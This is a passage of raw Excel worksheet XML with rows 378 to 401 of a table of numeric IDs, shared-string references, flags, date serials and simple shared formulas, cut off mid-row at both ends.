      <c r="E378" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F378" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="G378" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H378" s="1" t="s">
        <v>1868</v>
      </c>
      <c r="I378" s="1" t="s">
        <v>1869</v>
      </c>
      <c r="J378" s="1" t="s">
        <v>1870</v>
      </c>
      <c r="K378" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="L378" s="1">
        <v>3.0</v>
      </c>
      <c r="M378" s="1">
        <v>3.0</v>
      </c>
      <c r="N378" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O378" s="1" t="s">
        <v>1872</v>
      </c>
      <c r="P378" s="1" t="s">
        <v>311</v>
      </c>
      <c r="Q378" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R378" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S378" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="1">
        <v>5443.0</v>
      </c>
      <c r="B379" s="2" t="s">
        <v>1873</v>
      </c>
      <c r="C379" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D379" s="2" t="s">
        <v>1874</v>
      </c>
      <c r="E379" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F379" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G379" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H379" s="1" t="s">
        <v>1875</v>
      </c>
      <c r="I379" s="1" t="s">
        <v>1869</v>
      </c>
      <c r="J379" s="1" t="s">
        <v>1870</v>
      </c>
      <c r="K379" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="L379" s="1">
        <v>3.0</v>
      </c>
      <c r="M379" s="1">
        <v>3.0</v>
      </c>
      <c r="N379" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="O379" s="1" t="s">
        <v>1872</v>
      </c>
      <c r="P379" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q379" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R379" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S379" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="1">
        <v>5445.0</v>
      </c>
      <c r="B380" s="2" t="s">
        <v>1877</v>
      </c>
      <c r="C380" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D380" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="E380" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F380" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G380" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H380" s="1" t="s">
        <v>1879</v>
      </c>
      <c r="I380" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J380" s="1" t="s">
        <v>1880</v>
      </c>
      <c r="K380" s="2" t="s">
        <v>1881</v>
      </c>
      <c r="L380" s="1">
        <v>1.0</v>
      </c>
      <c r="M380" s="1">
        <v>1.0</v>
      </c>
      <c r="N380" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O380" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P380" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q380" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R380" s="2">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="S380" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="1">
        <v>5446.0</v>
      </c>
      <c r="B381" s="2" t="s">
        <v>1882</v>
      </c>
      <c r="C381" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D381" s="2" t="s">
        <v>1883</v>
      </c>
      <c r="E381" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F381" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G381" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H381" s="4">
        <v>44353.694444444445</v>
      </c>
      <c r="I381" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J381" s="1" t="s">
        <v>1884</v>
      </c>
      <c r="K381" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="L381" s="1">
        <v>1.0</v>
      </c>
      <c r="M381" s="1">
        <v>1.0</v>
      </c>
      <c r="N381" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O381" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P381" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q381" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R381" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S381" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="1">
        <v>5447.0</v>
      </c>
      <c r="B382" s="2" t="s">
        <v>1886</v>
      </c>
      <c r="C382" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D382" s="2" t="s">
        <v>1887</v>
      </c>
      <c r="E382" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F382" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G382" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H382" s="1" t="s">
        <v>1888</v>
      </c>
      <c r="I382" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J382" s="1" t="s">
        <v>1889</v>
      </c>
      <c r="K382" s="2" t="s">
        <v>1890</v>
      </c>
      <c r="L382" s="1">
        <v>1.0</v>
      </c>
      <c r="M382" s="1">
        <v>1.0</v>
      </c>
      <c r="N382" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O382" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P382" s="1" t="s">
        <v>1891</v>
      </c>
      <c r="Q382" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R382" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S382" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="1">
        <v>5448.0</v>
      </c>
      <c r="B383" s="2" t="s">
        <v>1892</v>
      </c>
      <c r="C383" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D383" s="2" t="s">
        <v>1893</v>
      </c>
      <c r="E383" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F383" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G383" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H383" s="4">
        <v>44317.92916666667</v>
      </c>
      <c r="I383" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J383" s="1" t="s">
        <v>1894</v>
      </c>
      <c r="K383" s="2" t="s">
        <v>1895</v>
      </c>
      <c r="L383" s="1">
        <v>1.0</v>
      </c>
      <c r="M383" s="1">
        <v>1.0</v>
      </c>
      <c r="N383" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O383" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P383" s="1" t="s">
        <v>1896</v>
      </c>
      <c r="Q383" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R383" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S383" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="1">
        <v>5449.0</v>
      </c>
      <c r="B384" s="2" t="s">
        <v>1897</v>
      </c>
      <c r="C384" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D384" s="2" t="s">
        <v>1898</v>
      </c>
      <c r="E384" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F384" s="1" t="s">
        <v>1899</v>
      </c>
      <c r="G384" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H384" s="4">
        <v>44323.49444444444</v>
      </c>
      <c r="I384" s="1" t="s">
        <v>1900</v>
      </c>
      <c r="J384" s="1" t="s">
        <v>1901</v>
      </c>
      <c r="K384" s="2" t="s">
        <v>1902</v>
      </c>
      <c r="L384" s="1">
        <v>4.0</v>
      </c>
      <c r="M384" s="1">
        <v>5.0</v>
      </c>
      <c r="N384" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O384" s="1" t="s">
        <v>1903</v>
      </c>
      <c r="P384" s="1" t="s">
        <v>1904</v>
      </c>
      <c r="Q384" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R384" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S384" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="1">
        <v>5461.0</v>
      </c>
      <c r="B385" s="2" t="s">
        <v>1905</v>
      </c>
      <c r="C385" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D385" s="2" t="s">
        <v>1906</v>
      </c>
      <c r="E385" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F385" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G385" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H385" s="1" t="s">
        <v>1907</v>
      </c>
      <c r="I385" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J385" s="1" t="s">
        <v>1908</v>
      </c>
      <c r="K385" s="2" t="s">
        <v>1909</v>
      </c>
      <c r="L385" s="1">
        <v>2.0</v>
      </c>
      <c r="M385" s="1">
        <v>4.0</v>
      </c>
      <c r="N385" s="1" t="s">
        <v>281</v>
      </c>
      <c r="O385" s="1" t="s">
        <v>1910</v>
      </c>
      <c r="P385" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q385" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R385" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S385" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="1">
        <v>5464.0</v>
      </c>
      <c r="B386" s="2" t="s">
        <v>1911</v>
      </c>
      <c r="C386" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D386" s="2" t="s">
        <v>1912</v>
      </c>
      <c r="E386" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F386" s="1" t="s">
        <v>1913</v>
      </c>
      <c r="G386" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H386" s="4">
        <v>44781.12222222222</v>
      </c>
      <c r="I386" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J386" s="1" t="s">
        <v>1914</v>
      </c>
      <c r="K386" s="2" t="s">
        <v>1915</v>
      </c>
      <c r="L386" s="1">
        <v>2.0</v>
      </c>
      <c r="M386" s="1">
        <v>2.0</v>
      </c>
      <c r="N386" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O386" s="1" t="s">
        <v>1916</v>
      </c>
      <c r="P386" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q386" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R386" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S386" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="1">
        <v>5465.0</v>
      </c>
      <c r="B387" s="2" t="s">
        <v>1917</v>
      </c>
      <c r="C387" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D387" s="2" t="s">
        <v>1918</v>
      </c>
      <c r="E387" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F387" s="1" t="s">
        <v>1919</v>
      </c>
      <c r="G387" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H387" s="4">
        <v>44782.31041666667</v>
      </c>
      <c r="I387" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J387" s="1" t="s">
        <v>1914</v>
      </c>
      <c r="K387" s="2" t="s">
        <v>1915</v>
      </c>
      <c r="L387" s="1">
        <v>2.0</v>
      </c>
      <c r="M387" s="1">
        <v>2.0</v>
      </c>
      <c r="N387" s="1" t="s">
        <v>1916</v>
      </c>
      <c r="O387" s="1" t="s">
        <v>1916</v>
      </c>
      <c r="P387" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q387" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R387" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S387" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="1">
        <v>5545.0</v>
      </c>
      <c r="B388" s="2" t="s">
        <v>1920</v>
      </c>
      <c r="C388" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D388" s="2" t="s">
        <v>1921</v>
      </c>
      <c r="E388" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="F388" s="1" t="s">
        <v>1922</v>
      </c>
      <c r="G388" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H388" s="4">
        <v>43320.645833333336</v>
      </c>
      <c r="I388" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J388" s="1" t="s">
        <v>1923</v>
      </c>
      <c r="K388" s="2" t="s">
        <v>1924</v>
      </c>
      <c r="L388" s="1">
        <v>1.0</v>
      </c>
      <c r="M388" s="1">
        <v>1.0</v>
      </c>
      <c r="N388" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O388" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P388" s="1" t="s">
        <v>1925</v>
      </c>
      <c r="Q388" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R388" s="2">
        <f t="shared" si="2"/>
        <v>15</v>
      </c>
      <c r="S388" s="1">
        <f t="shared" si="3"/>
        <v>15</v>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="1">
        <v>5585.0</v>
      </c>
      <c r="B389" s="2" t="s">
        <v>1926</v>
      </c>
      <c r="C389" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D389" s="2" t="s">
        <v>1927</v>
      </c>
      <c r="E389" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F389" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G389" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H389" s="4">
        <v>44353.68680555555</v>
      </c>
      <c r="I389" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J389" s="1" t="s">
        <v>1928</v>
      </c>
      <c r="K389" s="2" t="s">
        <v>1929</v>
      </c>
      <c r="L389" s="1">
        <v>1.0</v>
      </c>
      <c r="M389" s="1">
        <v>1.0</v>
      </c>
      <c r="N389" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O389" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P389" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q389" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R389" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S389" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="1">
        <v>5623.0</v>
      </c>
      <c r="B390" s="2" t="s">
        <v>1930</v>
      </c>
      <c r="C390" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D390" s="2" t="s">
        <v>1931</v>
      </c>
      <c r="E390" s="2" t="s">
        <v>663</v>
      </c>
      <c r="F390" s="1" t="s">
        <v>959</v>
      </c>
      <c r="G390" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H390" s="1" t="s">
        <v>1932</v>
      </c>
      <c r="I390" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J390" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="K390" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="L390" s="1">
        <v>8.0</v>
      </c>
      <c r="M390" s="1">
        <v>10.0</v>
      </c>
      <c r="N390" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O390" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="P390" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q390" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R390" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S390" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="1">
        <v>5624.0</v>
      </c>
      <c r="B391" s="2" t="s">
        <v>1936</v>
      </c>
      <c r="C391" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D391" s="2" t="s">
        <v>1937</v>
      </c>
      <c r="E391" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F391" s="1" t="s">
        <v>1938</v>
      </c>
      <c r="G391" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H391" s="1" t="s">
        <v>1939</v>
      </c>
      <c r="I391" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J391" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="K391" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="L391" s="1">
        <v>8.0</v>
      </c>
      <c r="M391" s="1">
        <v>10.0</v>
      </c>
      <c r="N391" s="1" t="s">
        <v>1940</v>
      </c>
      <c r="O391" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="P391" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q391" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R391" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S391" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="1">
        <v>5628.0</v>
      </c>
      <c r="B392" s="2" t="s">
        <v>1941</v>
      </c>
      <c r="C392" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D392" s="2" t="s">
        <v>1942</v>
      </c>
      <c r="E392" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F392" s="1" t="s">
        <v>1943</v>
      </c>
      <c r="G392" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H392" s="1" t="s">
        <v>1944</v>
      </c>
      <c r="I392" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J392" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="K392" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="L392" s="1">
        <v>8.0</v>
      </c>
      <c r="M392" s="1">
        <v>10.0</v>
      </c>
      <c r="N392" s="1" t="s">
        <v>1945</v>
      </c>
      <c r="O392" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="P392" s="1" t="s">
        <v>1946</v>
      </c>
      <c r="Q392" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R392" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S392" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="1">
        <v>5629.0</v>
      </c>
      <c r="B393" s="2" t="s">
        <v>1947</v>
      </c>
      <c r="C393" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D393" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="E393" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F393" s="1" t="s">
        <v>959</v>
      </c>
      <c r="G393" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H393" s="1" t="s">
        <v>1949</v>
      </c>
      <c r="I393" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J393" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="K393" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="L393" s="1">
        <v>8.0</v>
      </c>
      <c r="M393" s="1">
        <v>10.0</v>
      </c>
      <c r="N393" s="1" t="s">
        <v>1950</v>
      </c>
      <c r="O393" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="P393" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q393" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R393" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S393" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="1">
        <v>5630.0</v>
      </c>
      <c r="B394" s="2" t="s">
        <v>1951</v>
      </c>
      <c r="C394" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D394" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="E394" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F394" s="1" t="s">
        <v>959</v>
      </c>
      <c r="G394" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H394" s="1" t="s">
        <v>1952</v>
      </c>
      <c r="I394" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J394" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="K394" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="L394" s="1">
        <v>8.0</v>
      </c>
      <c r="M394" s="1">
        <v>10.0</v>
      </c>
      <c r="N394" s="1" t="s">
        <v>237</v>
      </c>
      <c r="O394" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="P394" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q394" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R394" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S394" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="1">
        <v>5631.0</v>
      </c>
      <c r="B395" s="2" t="s">
        <v>1953</v>
      </c>
      <c r="C395" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D395" s="2" t="s">
        <v>1948</v>
      </c>
      <c r="E395" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F395" s="1" t="s">
        <v>1954</v>
      </c>
      <c r="G395" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H395" s="4">
        <v>44597.00625</v>
      </c>
      <c r="I395" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J395" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="K395" s="2" t="s">
        <v>1934</v>
      </c>
      <c r="L395" s="1">
        <v>8.0</v>
      </c>
      <c r="M395" s="1">
        <v>10.0</v>
      </c>
      <c r="N395" s="1" t="s">
        <v>1955</v>
      </c>
      <c r="O395" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="P395" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q395" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R395" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S395" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="1">
        <v>5669.0</v>
      </c>
      <c r="B396" s="2" t="s">
        <v>1956</v>
      </c>
      <c r="C396" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D396" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="E396" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F396" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G396" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H396" s="1" t="s">
        <v>1958</v>
      </c>
      <c r="I396" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J396" s="1" t="s">
        <v>1959</v>
      </c>
      <c r="K396" s="2" t="s">
        <v>1960</v>
      </c>
      <c r="L396" s="1">
        <v>1.0</v>
      </c>
      <c r="M396" s="1">
        <v>1.0</v>
      </c>
      <c r="N396" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O396" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P396" s="1" t="s">
        <v>1961</v>
      </c>
      <c r="Q396" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R396" s="2">
        <f t="shared" si="2"/>
        <v>14</v>
      </c>
      <c r="S396" s="1">
        <f t="shared" si="3"/>
        <v>14</v>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="1">
        <v>5670.0</v>
      </c>
      <c r="B397" s="2" t="s">
        <v>1962</v>
      </c>
      <c r="C397" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D397" s="2" t="s">
        <v>1957</v>
      </c>
      <c r="E397" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F397" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G397" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H397" s="4">
        <v>44507.925</v>
      </c>
      <c r="I397" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J397" s="1" t="s">
        <v>1963</v>
      </c>
      <c r="K397" s="2" t="s">
        <v>1964</v>
      </c>
      <c r="L397" s="1">
        <v>1.0</v>
      </c>
      <c r="M397" s="1">
        <v>1.0</v>
      </c>
      <c r="N397" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O397" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P397" s="1" t="s">
        <v>1965</v>
      </c>
      <c r="Q397" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R397" s="2">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="S397" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="1">
        <v>5671.0</v>
      </c>
      <c r="B398" s="2" t="s">
        <v>1966</v>
      </c>
      <c r="C398" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D398" s="2" t="s">
        <v>1967</v>
      </c>
      <c r="E398" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F398" s="1" t="s">
        <v>1968</v>
      </c>
      <c r="G398" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H398" s="1" t="s">
        <v>1969</v>
      </c>
      <c r="I398" s="1" t="s">
        <v>778</v>
      </c>
      <c r="J398" s="1" t="s">
        <v>1970</v>
      </c>
      <c r="K398" s="2" t="s">
        <v>1971</v>
      </c>
      <c r="L398" s="1">
        <v>3.0</v>
      </c>
      <c r="M398" s="1">
        <v>5.0</v>
      </c>
      <c r="N398" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O398" s="1" t="s">
        <v>1972</v>
      </c>
      <c r="P398" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q398" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R398" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S398" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="1">
        <v>5672.0</v>
      </c>
      <c r="B399" s="2" t="s">
        <v>1973</v>
      </c>
      <c r="C399" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D399" s="2" t="s">
        <v>1967</v>
      </c>
      <c r="E399" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F399" s="1" t="s">
        <v>1968</v>
      </c>
      <c r="G399" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H399" s="1" t="s">
        <v>1974</v>
      </c>
      <c r="I399" s="1" t="s">
        <v>778</v>
      </c>
      <c r="J399" s="1" t="s">
        <v>1970</v>
      </c>
      <c r="K399" s="2" t="s">
        <v>1971</v>
      </c>
      <c r="L399" s="1">
        <v>3.0</v>
      </c>
      <c r="M399" s="1">
        <v>5.0</v>
      </c>
      <c r="N399" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O399" s="1" t="s">
        <v>1972</v>
      </c>
      <c r="P399" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q399" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R399" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S399" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="1">
        <v>5673.0</v>
      </c>
      <c r="B400" s="2" t="s">
        <v>1975</v>
      </c>
      <c r="C400" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D400" s="2" t="s">
        <v>1967</v>
      </c>
      <c r="E400" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F400" s="1" t="s">
        <v>1968</v>
      </c>
      <c r="G400" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H400" s="1" t="s">
        <v>1974</v>
      </c>
      <c r="I400" s="1" t="s">
        <v>778</v>
      </c>
      <c r="J400" s="1" t="s">
        <v>1970</v>
      </c>
      <c r="K400" s="2" t="s">
        <v>1971</v>
      </c>
      <c r="L400" s="1">
        <v>3.0</v>
      </c>
      <c r="M400" s="1">
        <v>5.0</v>
      </c>
      <c r="N400" s="1" t="s">
        <v>132</v>
      </c>
      <c r="O400" s="1" t="s">
        <v>1972</v>
      </c>
      <c r="P400" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q400" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R400" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S400" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="1">
        <v>5756.0</v>
      </c>
      <c r="B401" s="2" t="s">
        <v>1976</v>
      </c>
      <c r="C401" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D401" s="2" t="s">
        <v>1977</v>
      </c>
      <c r="E401" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F401" s="1" t="s">
        <v>1978</v>
      </c>
      <c r="G401" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H401" s="1" t="s">
        <v>1979</v>
      </c>
      <c r="I401" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J401" s="1" t="s">
        <v>1980</v>
      </c>
      <c r="K401" s="2" t="s">
        <v>1981</v>
      </c>
      <c r="L401" s="1">
        <v>3.0</v>
      </c>
      <c r="M401" s="1">
        <v>5.0</v>
      </c>
      <c r="N401" s="1" t="s">
        <v>37</v>
      </c>
